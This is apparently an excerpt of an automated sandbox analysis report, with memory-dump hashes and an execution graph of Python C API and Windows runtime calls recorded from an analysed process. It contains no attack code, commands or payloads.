                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58a4aebfcac063af9787b3daf58056d2b33de2cf218699b292efc5f5f8ad9be7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C411E32F0CE494FE79DAA5C64552B9B3D1EFA6221B84117EC10EC318BFD19E8078751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1613758563.00007FF7BDB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDB90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdb90000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction ID: 4598adcd63fbaabcb5c6da119e3d2362d75b9fa8d2f2ad47deb340f8e7e9fa61
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01677111CB0C4FDB48EF0CE451AA6B7E0FB99364F50066DE58AC3655D636E881CB46

Execution Graph

Execution Coverage:0.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4.3%
Total number of Nodes:1526
Total number of Limit Nodes:4
7ff81ec993da PyErr_Format 12299->12300 12299->12301 12302 7ff81ec9940d 12300->12302 12301->12302 12303 7ff81ec99438 _Py_Dealloc 12301->12303 12303->12302 12304 7ff81ec9e3c0 12305 7ff81ec9e44f PyErr_Format 12304->12305 12307 7ff81ec9eb46 12305->12307 12308 7ff81ecaffc0 12309 7ff81ecb0002 12308->12309 12310 7ff81ecb001f 12308->12310 12311 7ff81ecb0011 PyObject_GetAttr 12309->12311 12312 7ff81ecb0007 12309->12312 12313 7ff81ecb003a _PyType_Lookup 12310->12313 12314 7ff81ecb0029 PyType_Ready 12310->12314 12311->12312 12316 7ff81ecb014b 12312->12316 12327 7ff81ecb0142 _Py_Dealloc 12312->12327 12315 7ff81ecb008a _PyObject_GetDictPtr 12313->12315 12320 7ff81ecb004e 12313->12320 12314->12313 12314->12316 12317 7ff81ecb00f2 12315->12317 12318 7ff81ecb0098 12315->12318 12317->12316 12325 7ff81ecb015a 12317->12325 12326 7ff81ecb0080 12317->12326 12318->12317 12321 7ff81ecb00a0 _PyDict_GetItem_KnownHash 12318->12321 12319 7ff81ecb0082 12319->12315 12320->12315 12320->12319 12322 7ff81ecb0073 PyDescr_IsData 12320->12322 12323 7ff81ecb00e3 12321->12323 12324 7ff81ecb00bb 12321->12324 12322->12315 12322->12326 12323->12317 12331 7ff81ecb00e9 _Py_Dealloc 12323->12331 12328 7ff81ecb00c4 _Py_Dealloc 12324->12328 12329 7ff81ecb00cd 12324->12329 12325->12316 12330 7ff81ecb0164 PyErr_Format 12325->12330 12326->12312 12332 7ff81ecb0114 _Py_Dealloc 12326->12332 12327->12316 12328->12329 12329->12312 12333 7ff81ecb00d8 _Py_Dealloc 12329->12333 12330->12316 12331->12317 12332->12312 12333->12312 12334 7ff81ecadfc0 PyErr_Format 12501 7ff81df4ed08 12504 7ff81df4ed1c IsProcessorFeaturePresent 12501->12504 12505 7ff81df4ed3b capture_current_context 12504->12505 12506 7ff81df4ed33 12504->12506 12509 7ff81df4ec00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12505->12509 12506->12505 12510 7ff81ec9ebc4 12512 7ff81ec9ebd6 12510->12512 12511 7ff81ec9faf3 12512->12511 12513 7ff81ec9eca3 12512->12513 12514 7ff81ec9ec6e PyErr_Format 12512->12514 12516 
7ff81ec9ecf6 12513->12516 12517 7ff81ec9ece1 PyUnicode_Decode 12513->12517 12518 7ff81ec9eccf PyUnicode_DecodeUTF8 12513->12518 12515 7ff81ec9ed06 12514->12515 12521 7ff81ec9fab1 12515->12521 12524 7ff81ec9faa8 _Py_Dealloc 12515->12524 12516->12515 12519 7ff81ec9ed30 12516->12519 12520 7ff81ec9ed2a _Py_Dealloc 12516->12520 12517->12516 12518->12516 12522 7ff81ec9ed73 12519->12522 12523 7ff81ec9ed4c PyErr_SetString 12519->12523 12520->12519 12525 7ff81ec9fac9 12521->12525 12528 7ff81ec9fac0 _Py_Dealloc 12521->12528 12526 7ff81ec9eda0 12522->12526 12527 7ff81ec9ed97 _Py_Dealloc 12522->12527 12553 7ff81ec9ed7e 12522->12553 12523->12553 12524->12521 12530 7ff81ec9fae1 12525->12530 12533 7ff81ec9fad8 _Py_Dealloc 12525->12533 12531 7ff81ec9eea4 12526->12531 12532 7ff81ec9edae 12526->12532 12527->12526 12528->12525 12529 7ff81ec9f896 _Py_Dealloc 12606 7ff81ec9f682 12529->12606 12537 7ff81ec9eecd 12531->12537 12538 7ff81ec9eebc _PyUnicode_Ready 12531->12538 12569 7ff81ec9eed3 12531->12569 12534 7ff81ec9edd1 PyObject_GetAttr 12532->12534 12542 7ff81ec9edcc 12532->12542 12533->12530 12534->12542 12535 7ff81ec9f8aa _Py_Dealloc 12600 7ff81ec9f3aa 12535->12600 12536 7ff81ec9f8c8 PyErr_GetExcInfo PyErr_SetExcInfo 12547 7ff81ec9f8f8 12536->12547 12544 7ff81ec9ef45 PyErr_SetString 12537->12544 12537->12569 12538->12537 12543 7ff81ec9eddf 12538->12543 12539 7ff81ec9f8bf _Py_Dealloc 12539->12536 12540 7ff81ec9eef4 12548 7ff81ec9ef04 PyErr_Format 12540->12548 12549 7ff81ec9ef7f PyUnicode_Find 12540->12549 12541 7ff81ec9f7ce PyTuple_New 12541->12543 12546 7ff81ec9f804 PyDict_New 12541->12546 12542->12543 12545 7ff81ec9ee02 PyDict_New 12542->12545 12543->12536 12544->12543 12551 7ff81ec9ee20 PyDict_SetItem 12545->12551 12545->12553 12552 7ff81ec9f830 PyDict_SetItem 12546->12552 12546->12553 12554 7ff81ec9f8fc PyErr_Fetch 12547->12554 12555 7ff81ec9f90e PyByteArray_Resize 12547->12555 12548->12536 12549->12543 12550 7ff81ec9efc6 12549->12550 12558 7ff81ec9efd0 12550->12558 12559 
7ff81ec9f1bc 12550->12559 12551->12553 12560 7ff81ec9ee4b PyDict_SetItem 12551->12560 12552->12553 12561 7ff81ec9ee76 12552->12561 12553->12529 12553->12606 12554->12555 12556 7ff81ec9f9a0 12555->12556 12557 7ff81ec9f92c PyErr_SetExcInfo 12555->12557 12567 7ff81ec9f9a6 _Py_Dealloc 12556->12567 12568 7ff81ec9f9af PyErr_SetExcInfo PyErr_Restore 12556->12568 12562 7ff81ec9f965 12557->12562 12563 7ff81ec9f959 12557->12563 12564 7ff81ec9eff5 PyErr_Format 12558->12564 12565 7ff81ec9f036 PyUnicode_Find 12558->12565 12566 7ff81ec9f1cc PyErr_SetString 12559->12566 12578 7ff81ec9f206 12559->12578 12560->12553 12560->12561 12561->12553 12573 7ff81ec9f9e1 12561->12573 12571 7ff81ec9f97e 12562->12571 12574 7ff81ec9f978 _Py_Dealloc 12562->12574 12563->12562 12570 7ff81ec9f95f _Py_Dealloc 12563->12570 12564->12536 12565->12543 12572 7ff81ec9f07d 12565->12572 12566->12536 12567->12568 12568->12515 12569->12540 12569->12541 12569->12543 12570->12562 12575 7ff81ec9f997 12571->12575 12576 7ff81ec9f991 _Py_Dealloc 12571->12576 12577 7ff81ec9f0b6 PyErr_SetString 12572->12577 12591 7ff81ec9f0f0 12572->12591 12616 7ff81ec9f082 12572->12616 12579 7ff81ec9f9f1 12573->12579 12580 7ff81ec9f9e8 _Py_Dealloc 12573->12580 12574->12571 12575->12515 12588 7ff81ec9fa51 _Py_Dealloc 12575->12588 12576->12575 12577->12536 12578->12543 12583 7ff81ec9f28d PyLong_FromLong 12578->12583 12584 7ff81ec9f24c PyErr_Format 12578->12584 12581 7ff81ec9fa00 12579->12581 12582 7ff81ec9f9f7 _Py_Dealloc 12579->12582 12580->12579 12586 7ff81ec9fa13 PyByteArray_Resize 12581->12586 12587 7ff81ec9fa0d _Py_Dealloc 12581->12587 12582->12581 12583->12543 12585 7ff81ec9f2c2 12583->12585 12584->12536 12592 7ff81ec9f2d3 12585->12592 12593 7ff81ec9f367 PyNumber_Index 12585->12593 12586->12575 12594 7ff81ec9fa71 12586->12594 12587->12586 12588->12515 12589 7ff81ec9f604 12589->12543 12596 7ff81ec9f63a PyDict_New 12589->12596 12590 7ff81ec9f609 PyObject_GetAttr 12590->12589 12591->12543 12595 7ff81ec9f139 PyErr_SetString 
12591->12595 12591->12616 12597 7ff81ec9f2e8 12592->12597 12602 7ff81ec9f359 PyLong_AsSsize_t 12592->12602 12593->12597 12598 7ff81ec9f37e PyLong_AsSsize_t 12593->12598 12594->12515 12599 7ff81ec9fa77 _Py_Dealloc 12594->12599 12595->12536 12596->12600 12601 7ff81ec9f66b PyDict_SetItem 12596->12601 12603 7ff81ec9f39f PyErr_Occurred 12597->12603 12605 7ff81ec9f3cd 12597->12605 12598->12597 12604 7ff81ec9f390 _Py_Dealloc 12598->12604 12599->12515 12600->12536 12600->12539 12601->12606 12607 7ff81ec9f6a5 PyDict_SetItem 12601->12607 12602->12597 12603->12600 12603->12605 12604->12597 12608 7ff81ec9f3d4 _Py_Dealloc 12605->12608 12609 7ff81ec9f3dd PyUnicode_Find 12605->12609 12606->12535 12606->12600 12607->12606 12610 7ff81ec9f6df PyDict_SetItem 12607->12610 12608->12609 12609->12543 12611 7ff81ec9f435 12609->12611 12610->12606 12612 7ff81ec9f719 PyDict_SetItem 12610->12612 12613 7ff81ec9f445 12611->12613 12614 7ff81ec9f4db 12611->12614 12612->12606 12615 7ff81ec9f757 12612->12615 12613->12616 12617 7ff81ec9f44e PyErr_SetString 12613->12617 12618 7ff81ec9f4e4 PyErr_SetString 12614->12618 12622 7ff81ec9f51e 12614->12622 12615->12606 12619 7ff81ec9f794 12615->12619 12616->12543 12616->12589 12616->12590 12617->12536 12618->12536 12620 7ff81ec9f7a4 12619->12620 12621 7ff81ec9f79b _Py_Dealloc 12619->12621 12623 7ff81ec9f7b3 12620->12623 12624 7ff81ec9f7aa _Py_Dealloc 12620->12624 12621->12620 12622->12543 12622->12616 12625 7ff81ec9f56b PyErr_SetString 12622->12625 12626 7ff81ec9f7c0 _Py_Dealloc 12623->12626 12627 7ff81ec9f7c6 12623->12627 12624->12623 12625->12536 12626->12627 12627->12586 12789 7ff81ecb27ba 12791 7ff81ecb27c6 12789->12791 12790 7ff81ecb53fc abort 12791->12790 12792 7ff81ecb27fd 12791->12792 12793 7ff81df2e710 EnterCriticalSection 12794 7ff81df2e7dd LeaveCriticalSection 12793->12794 12795 7ff81df2e744 12793->12795 12796 7ff81df2e806 malloc 12794->12796 12798 7ff81df2e7fa 12794->12798 12797 7ff81df2e790 LeaveCriticalSection 12795->12797 12799 7ff81df2e7a3 
12795->12799 12796->12798 12797->12798 12799->12794 12800 7ff81df2e7cb 12799->12800 12801 7ff81df2e7d7 free 12799->12801 12800->12794 12801->12794 12802 7ff81df31110 12803 7ff81df3112d EnterCriticalSection 12802->12803 12804 7ff81df31231 12802->12804 12806 7ff81df31140 12803->12806 12805 7ff81df3121f LeaveCriticalSection 12805->12804 12806->12805 12807 7ff81df31200 SleepConditionVariableCS 12806->12807 12807->12806 14524 7ff81ec51140 PyModuleDef_Init 12978 7ff81ecadbf0 12979 7ff81ecadc03 PyObject_GetAttr 12978->12979 12980 7ff81ecadc00 12978->12980 12980->12979 13144 7ff81df31b20 13146 7ff81df31b43 13144->13146 13145 7ff81df31b48 13146->13145 13147 7ff81df31bfe memmove 13146->13147 13147->13145 14927 7ff81ec81470 14928 7ff81ec8157d 14927->14928 14934 7ff81ec814a6 14927->14934 14929 7ff81ec81583 PyErr_Format 14928->14929 14944 7ff81ec8155e 14928->14944 14941 7ff81ec81557 14929->14941 14930 7ff81ec814d7 PyDict_Size 14931 7ff81ec814f3 _PyDict_GetItem_KnownHash 14930->14931 14936 7ff81ec814eb 14930->14936 14931->14929 14931->14936 14932 7ff81ec82840 27 API calls 14937 7ff81ec815e4 14932->14937 14934->14929 14934->14930 14935 7ff81ec81517 _PyDict_GetItem_KnownHash 14938 7ff81ec814f1 14935->14938 14939 7ff81ec81568 14935->14939 14936->14935 14936->14938 14938->14944 14945 7ff81ec82310 PyDict_Next 14938->14945 14958 7ff81ec822c0 PyErr_Format 14939->14958 14941->14932 14943 7ff81ec81553 14943->14941 14943->14944 14959 7ff81ec81630 14944->14959 14946 7ff81ec824b3 14945->14946 14949 7ff81ec82368 14945->14949 14946->14943 14947 7ff81ec824fa PyErr_Format 14948 7ff81ec82518 14947->14948 14948->14943 14949->14947 14950 7ff81ec82493 PyDict_Next 14949->14950 14953 7ff81ec823d6 PyUnicode_Compare 14949->14953 14956 7ff81ec8240a 14949->14956 14950->14946 14950->14949 14951 7ff81ec82459 PyErr_Format 14951->14943 14953->14949 14954 7ff81ec823e5 PyErr_Occurred 14953->14954 14954->14948 14954->14949 14955 7ff81ec82429 PyUnicode_Compare 14955->14956 14957 7ff81ec82438 PyErr_Occurred 
14955->14957 14956->14951 14956->14955 14957->14948 14957->14956 14958->14941 14960 7ff81ec8169f 14959->14960 14961 7ff81ec8165c PyObject_Size 14959->14961 14964 7ff81ec816e3 14960->14964 14985 7ff81ec82530 14960->14985 14962 7ff81ec8166b 14961->14962 14963 7ff81ec81679 14961->14963 14970 7ff81ec82840 27 API calls 14962->14970 14963->14960 14967 7ff81ec8167f PyErr_SetNone 14963->14967 14965 7ff81ec8170c 14964->14965 14966 7ff81ec816f3 PyType_IsSubtype 14964->14966 14965->14962 14971 7ff81ec81741 PyObject_Size 14965->14971 14975 7ff81ec8173b _Py_Dealloc 14965->14975 14966->14965 14969 7ff81ec816fd 14966->14969 14967->14962 14973 7ff81ec82530 12 API calls 14969->14973 14974 7ff81ec817ec 14970->14974 14971->14962 14976 7ff81ec8175e 14971->14976 14973->14965 14981 7ff81ec818a4 14974->14981 14982 7ff81ec8189b _Py_Dealloc 14974->14982 14975->14971 14977 7ff81ec817a3 PyByteArray_AsString 14976->14977 14979 7ff81ec81774 PyErr_Format 14976->14979 14977->14962 14980 7ff81ec817bf PyBytes_AsString 14977->14980 14978 7ff81ec816dd _Py_Dealloc 14978->14964 14979->14962 14980->14962 14980->14974 14983 7ff81ec818bd 14981->14983 14984 7ff81ec818b4 _Py_Dealloc 14981->14984 14982->14981 14983->14937 14984->14983 14986 7ff81ec8255a PyType_IsSubtype 14985->14986 14987 7ff81ec82564 14985->14987 14986->14987 14988 7ff81ec825da PyTuple_New 14986->14988 14987->14988 14989 7ff81ec82570 Py_EnterRecursiveCall 14987->14989 14991 7ff81ec816be 14988->14991 14992 7ff81ec825f4 14988->14992 14989->14991 14993 7ff81ec82597 Py_LeaveRecursiveCall 14989->14993 14991->14962 14991->14964 14991->14978 14994 7ff81ec8260c PyObject_Call 14992->14994 14995 7ff81ec82620 Py_EnterRecursiveCall 14992->14995 14993->14991 15001 7ff81ec825ae PyErr_Occurred 14993->15001 14996 7ff81ec82631 14994->14996 14995->14996 14997 7ff81ec82635 Py_LeaveRecursiveCall 14995->14997 14996->14991 14999 7ff81ec82676 _Py_Dealloc 14996->14999 14997->14996 15002 7ff81ec8264e PyErr_Occurred 14997->15002 14999->14991 15001->14991 15003 
7ff81ec825b9 PyErr_SetString 15001->15003 15002->14996 15004 7ff81ec82659 PyErr_SetString 15002->15004 15003->14991 15004->14996 14592 7ff81ec522dc 14593 7ff81ec522e5 PyErr_SetString 14592->14593 14594 7ff81ec52300 14592->14594 14593->14594 13647 7ff81eca27e0 PyErr_GetExcInfo 13648 7ff81eca2842 13647->13648 13649 7ff81eca2993 13648->13649 13650 7ff81eca284b PyErr_ExceptionMatches 13648->13650 13651 7ff81eca29a2 PyErr_SetExcInfo 13649->13651 13652 7ff81eca2999 _Py_Dealloc 13649->13652 13653 7ff81eca28c3 PyErr_SetExcInfo 13650->13653 13662 7ff81eca2876 13650->13662 13660 7ff81eca2911 13651->13660 13652->13651 13654 7ff81eca28e9 13653->13654 13655 7ff81eca28da 13653->13655 13656 7ff81eca28fd 13654->13656 13659 7ff81eca28f4 _Py_Dealloc 13654->13659 13655->13654 13658 7ff81eca28e0 _Py_Dealloc 13655->13658 13656->13660 13663 7ff81eca2908 _Py_Dealloc 13656->13663 13657 7ff81eca29e1 13658->13654 13659->13656 13660->13657 13661 7ff81eca29d8 _Py_Dealloc 13660->13661 13661->13657 13664 7ff81eca2930 13662->13664 13665 7ff81eca28a8 13662->13665 13663->13660 13666 7ff81eca2941 _Py_Dealloc 13664->13666 13667 7ff81eca2947 13664->13667 13665->13653 13666->13667 13668 7ff81eca2958 _Py_Dealloc 13667->13668 13669 7ff81eca295e 13667->13669 13668->13669 13670 7ff81eca2964 _Py_Dealloc 13669->13670 13671 7ff81eca296d 13669->13671 13670->13671 13672 7ff81eca2977 _Py_Dealloc 13671->13672 13673 7ff81eca297d 13671->13673 13672->13673 13674 7ff81eca2983 _Py_Dealloc 13673->13674 13675 7ff81eca298c 13673->13675 13674->13675 13675->13651 15005 7ff81dee2940 EnterCriticalSection 15010 7ff81dee296f 15005->15010 15006 7ff81dee299f 15007 7ff81dee29e1 LeaveCriticalSection 15006->15007 15009 7ff81dee29a8 WakeConditionVariable 15006->15009 15008 7ff81dee297c SleepConditionVariableCS 15008->15010 15009->15007 15010->15006 15010->15007 15010->15008 13676 7ff81df034c0 13678 7ff81df0359d 13676->13678 13680 7ff81df4ebe0 13678->13680 13681 7ff81df4ebe9 13680->13681 13682 7ff81df03a2d 13681->13682 13683 
7ff81df4ec34 IsProcessorFeaturePresent 13681->13683 13684 7ff81df4ec4c 13683->13684 13685 7ff81df4ec53 capture_previous_context 13683->13685 13684->13685 13688 7ff81df4ec00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13685->13688 13689 7ff81eca7bd8 13690 7ff81ecadb3f 13689->13690 13691 7ff81ecadb93 PyErr_Occurred 13690->13691 13692 7ff81ecadb50 13690->13692 13693 7ff81ecadbb5 13691->13693 13694 7ff81ecadb9e PyErr_SetString 13691->13694 13692->13693 13695 7ff81ecadb8b _Py_Dealloc 13692->13695 13694->13693 13695->13693 14020 7ff81eca83df 14021 7ff81ecad2ed 14020->14021 14022 7ff81ecad303 14021->14022 14023 7ff81ecad2fa _Py_Dealloc 14021->14023 14024 7ff81ecad317 14022->14024 14025 7ff81ecad30e _Py_Dealloc 14022->14025 14023->14022 14026 7ff81ecad32c 14024->14026 14027 7ff81ecad323 _Py_Dealloc 14024->14027 14025->14024 14028 7ff81ecad341 14026->14028 14029 7ff81ecad338 _Py_Dealloc 14026->14029 14027->14026 14030 7ff81ecad35d 14028->14030 14031 7ff81ecad354 _Py_Dealloc 14028->14031 14029->14028 14032 7ff81ecad379 14030->14032 14033 7ff81ecad370 _Py_Dealloc 14030->14033 14031->14030 14034 7ff81ecad395 14032->14034 14035 7ff81ecad38c _Py_Dealloc 14032->14035 14033->14032 14036 7ff81ecad3b1 14034->14036 14037 7ff81ecad3a8 _Py_Dealloc 14034->14037 14035->14034 14038 7ff81ecad3cd 14036->14038 14039 7ff81ecad3c4 _Py_Dealloc 14036->14039 14037->14036 14040 7ff81ecad3e6 14038->14040 14041 7ff81ecad3dd _Py_Dealloc 14038->14041 14039->14038 14042 7ff81ecad3ff 14040->14042 14043 7ff81ecad3f6 _Py_Dealloc 14040->14043 14041->14040 14044 7ff81ecad418 14042->14044 14046 7ff81ecad40f _Py_Dealloc 14042->14046 14043->14042 14045 7ff81ecad431 14044->14045 14047 7ff81ecad428 _Py_Dealloc 14044->14047 14048 7ff81ecad44a 14045->14048 14049 7ff81ecad441 _Py_Dealloc 14045->14049 14046->14044 14047->14045 14050 7ff81ecad463 14048->14050 14051 7ff81ecad45a _Py_Dealloc 14048->14051 14049->14048 14052 7ff81ecad47c 14050->14052 14053 7ff81ecad473 
_Py_Dealloc 14050->14053 14051->14050 14054 7ff81ecad495 14052->14054 14056 7ff81ecad48c _Py_Dealloc 14052->14056 14053->14052 14055 7ff81ecad4ae 14054->14055 14057 7ff81ecad4a5 _Py_Dealloc 14054->14057 14058 7ff81ecad4c7 14055->14058 14059 7ff81ecad4be _Py_Dealloc 14055->14059 14056->14054 14057->14055 14060 7ff81ecad4e3 14058->14060 14061 7ff81ecad4da _Py_Dealloc 14058->14061 14059->14058 14062 7ff81ecad4ff 14060->14062 14063 7ff81ecad4f6 _Py_Dealloc 14060->14063 14061->14060 14064 7ff81ecad51b 14062->14064 14065 7ff81ecad512 _Py_Dealloc 14062->14065 14063->14062 14066 7ff81ecad537 14064->14066 14067 7ff81ecad52e _Py_Dealloc 14064->14067 14065->14064 14068 7ff81ecad553 14066->14068 14069 7ff81ecad54a _Py_Dealloc 14066->14069 14067->14066 14070 7ff81ecad56f 14068->14070 14071 7ff81ecad566 _Py_Dealloc 14068->14071 14069->14068 14072 7ff81ecad58b 14070->14072 14073 7ff81ecad582 _Py_Dealloc 14070->14073 14071->14070 14074 7ff81ecad5a7 14072->14074 14075 7ff81ecad59e _Py_Dealloc 14072->14075 14073->14072 14076 7ff81ecad5c3 14074->14076 14078 7ff81ecad5ba _Py_Dealloc 14074->14078 14075->14074 14077 7ff81ecad5df 14076->14077 14079 7ff81ecad5d6 _Py_Dealloc 14076->14079 14080 7ff81ecad5fb 14077->14080 14081 7ff81ecad5f2 _Py_Dealloc 14077->14081 14078->14076 14079->14077 14082 7ff81ecad617 14080->14082 14083 7ff81ecad60e _Py_Dealloc 14080->14083 14081->14080 14084 7ff81ecad633 14082->14084 14085 7ff81ecad62a _Py_Dealloc 14082->14085 14083->14082 14086 7ff81ecad64f 14084->14086 14088 7ff81ecad646 _Py_Dealloc 14084->14088 14085->14084 14087 7ff81ecad66b 14086->14087 14089 7ff81ecad662 _Py_Dealloc 14086->14089 14090 7ff81ecad687 14087->14090 14091 7ff81ecad67e _Py_Dealloc 14087->14091 14088->14086 14089->14087 14092 7ff81ecad6a3 14090->14092 14093 7ff81ecad69a _Py_Dealloc 14090->14093 14091->14090 14094 7ff81ecad6bf 14092->14094 14095 7ff81ecad6b6 _Py_Dealloc 14092->14095 14093->14092 14096 7ff81ecad6db 14094->14096 14097 7ff81ecad6d2 _Py_Dealloc 14094->14097 14095->14094 
14098 7ff81ecad6f7 14096->14098 14099 7ff81ecad6ee _Py_Dealloc 14096->14099 14097->14096 14100 7ff81ecad713 14098->14100 14101 7ff81ecad70a _Py_Dealloc 14098->14101 14099->14098 14102 7ff81ecad72f 14100->14102 14103 7ff81ecad726 _Py_Dealloc 14100->14103 14101->14100 14104 7ff81ecad74b 14102->14104 14105 7ff81ecad742 _Py_Dealloc 14102->14105 14103->14102 14106 7ff81ecad767 14104->14106 14107 7ff81ecad75e _Py_Dealloc 14104->14107 14105->14104 14108 7ff81ecad783 14106->14108 14110 7ff81ecad77a _Py_Dealloc 14106->14110 14107->14106 14109 7ff81ecad79f 14108->14109 14111 7ff81ecad796 _Py_Dealloc 14108->14111 14112 7ff81ecad7bb 14109->14112 14113 7ff81ecad7b2 _Py_Dealloc 14109->14113 14110->14108 14111->14109 14114 7ff81ecad7d7 14112->14114 14115 7ff81ecad7ce _Py_Dealloc 14112->14115 14113->14112 14116 7ff81ecad7f3 14114->14116 14117 7ff81ecad7ea _Py_Dealloc 14114->14117 14115->14114 14118 7ff81ecad80f 14116->14118 14120 7ff81ecad806 _Py_Dealloc 14116->14120 14117->14116 14119 7ff81ecad82b 14118->14119 14121 7ff81ecad822 _Py_Dealloc 14118->14121 14122 7ff81ecad847 14119->14122 14123 7ff81ecad83e _Py_Dealloc 14119->14123 14120->14118 14121->14119 14124 7ff81ecad863 14122->14124 14125 7ff81ecad85a _Py_Dealloc 14122->14125 14123->14122 14126 7ff81ecad87f 14124->14126 14127 7ff81ecad876 _Py_Dealloc 14124->14127 14125->14124 14128 7ff81ecad89b 14126->14128 14129 7ff81ecad892 _Py_Dealloc 14126->14129 14127->14126 14130 7ff81ecad8b7 14128->14130 14131 7ff81ecad8ae _Py_Dealloc 14128->14131 14129->14128 14132 7ff81ecad8d3 14130->14132 14133 7ff81ecad8ca _Py_Dealloc 14130->14133 14131->14130 14134 7ff81ecad8e6 _Py_Dealloc 14132->14134 14136 7ff81ecad8ef 14132->14136 14133->14132 14134->14136 14135 7ff81ecad90b 14138 7ff81ecad927 14135->14138 14139 7ff81ecad91e _Py_Dealloc 14135->14139 14136->14135 14137 7ff81ecad902 _Py_Dealloc 14136->14137 14137->14135 14140 7ff81ecad943 14138->14140 14142 7ff81ecad93a _Py_Dealloc 14138->14142 14139->14138 14141 7ff81ecad95f 14140->14141 14143 
7ff81ecad956 _Py_Dealloc 14140->14143 14144 7ff81ecad97b 14141->14144 14145 7ff81ecad972 _Py_Dealloc 14141->14145 14142->14140 14143->14141 14146 7ff81ecad997 14144->14146 14147 7ff81ecad98e _Py_Dealloc 14144->14147 14145->14144 14148 7ff81ecad9b3 14146->14148 14149 7ff81ecad9aa _Py_Dealloc 14146->14149 14147->14146 14150 7ff81ecad9cf 14148->14150 14152 7ff81ecad9c6 _Py_Dealloc 14148->14152 14149->14148 14151 7ff81ecad9eb 14150->14151 14153 7ff81ecad9e2 _Py_Dealloc 14150->14153 14154 7ff81ecada07 14151->14154 14155 7ff81ecad9fe _Py_Dealloc 14151->14155 14152->14150 14153->14151 14156 7ff81ecada23 14154->14156 14157 7ff81ecada1a _Py_Dealloc 14154->14157 14155->14154 14158 7ff81ecada3f 14156->14158 14159 7ff81ecada36 _Py_Dealloc 14156->14159 14157->14156 14160 7ff81ecada5b 14158->14160 14161 7ff81ecada52 _Py_Dealloc 14158->14161 14159->14158 14162 7ff81ecada77 14160->14162 14163 7ff81ecada6e _Py_Dealloc 14160->14163 14161->14160 14164 7ff81ecada93 14162->14164 14165 7ff81ecada8a _Py_Dealloc 14162->14165 14163->14162 14166 7ff81ecadaaf 14164->14166 14167 7ff81ecadaa6 _Py_Dealloc 14164->14167 14165->14164 14168 7ff81ecadacb 14166->14168 14169 7ff81ecadac2 _Py_Dealloc 14166->14169 14167->14166 14170 7ff81ecadae7 14168->14170 14171 7ff81ecadade _Py_Dealloc 14168->14171 14169->14168 14172 7ff81ecadb03 14170->14172 14174 7ff81ecadafa _Py_Dealloc 14170->14174 14171->14170 14173 7ff81ecadb1f 14172->14173 14175 7ff81ecadb16 _Py_Dealloc 14172->14175 14176 7ff81ecadb46 14173->14176 14177 7ff81ecadb2a _Py_Dealloc 14173->14177 14174->14172 14175->14173 14178 7ff81ecadb93 PyErr_Occurred 14176->14178 14179 7ff81ecadb50 14176->14179 14177->14176 14180 7ff81ecadbb5 14178->14180 14181 7ff81ecadb9e PyErr_SetString 14178->14181 14179->14180 14182 7ff81ecadb8b _Py_Dealloc 14179->14182 14181->14180 14182->14180 14595 7ff81ec818e0 PyThreadState_Get PyInterpreterState_GetID 14596 7ff81ec8190b 14595->14596 14597 7ff81ec81938 14595->14597 14598 7ff81ec8192d 14596->14598 14600 7ff81ec8195e 
PyObject_GetAttrString 14596->14600 14597->14596 14599 7ff81ec8193d PyErr_SetString 14597->14599 14599->14598 14601 7ff81ec8198e PyModule_NewObject 14600->14601 14602 7ff81ec81a10 14600->14602 14603 7ff81ec819a9 14601->14603 14604 7ff81ec819a0 _Py_Dealloc 14601->14604 14603->14602 14605 7ff81ec819ae PyModule_GetDict 14603->14605 14604->14603 14606 7ff81ec819bf PyObject_GetAttrString 14605->14606 14631 7ff81ec81a01 14605->14631 14607 7ff81ec81a2e PyErr_ExceptionMatches 14606->14607 14608 7ff81ec819d7 PyDict_SetItemString 14606->14608 14612 7ff81ec81a42 PyErr_Clear 14607->14612 14607->14631 14610 7ff81ec819fc 14608->14610 14611 7ff81ec819f3 _Py_Dealloc 14608->14611 14609 7ff81ec81a07 _Py_Dealloc 14609->14602 14613 7ff81ec81a48 PyObject_GetAttrString 14610->14613 14610->14631 14611->14610 14612->14613 14614 7ff81ec81a90 PyErr_ExceptionMatches 14613->14614 14615 7ff81ec81a60 PyDict_SetItemString 14613->14615 14618 7ff81ec81aa8 PyErr_Clear 14614->14618 14614->14631 14616 7ff81ec81a7c _Py_Dealloc 14615->14616 14617 7ff81ec81a85 14615->14617 14616->14617 14619 7ff81ec81aae PyObject_GetAttrString 14617->14619 14617->14631 14618->14619 14620 7ff81ec81af6 PyErr_ExceptionMatches 14619->14620 14621 7ff81ec81ac6 PyDict_SetItemString 14619->14621 14624 7ff81ec81b0e PyErr_Clear 14620->14624 14620->14631 14622 7ff81ec81aeb 14621->14622 14623 7ff81ec81ae2 _Py_Dealloc 14621->14623 14625 7ff81ec81b14 PyObject_GetAttrString 14622->14625 14622->14631 14623->14622 14624->14625 14626 7ff81ec81b2c 14625->14626 14627 7ff81ec81b64 PyErr_ExceptionMatches 14625->14627 14628 7ff81ec81b4b 14626->14628 14629 7ff81ec81b35 PyDict_SetItemString 14626->14629 14630 7ff81ec81b7c PyErr_Clear 14627->14630 14627->14631 14628->14631 14632 7ff81ec81b51 _Py_Dealloc 14628->14632 14629->14628 14630->14602 14631->14602 14631->14609 14632->14631 11153 7ff81ecb1490 11154 7ff81ecb14a1 PyImport_ImportModule 11153->11154 11155 7ff81ecb1549 11153->11155 11156 7ff81ecb14b3 PyErr_WriteUnraisable PyErr_WarnEx 
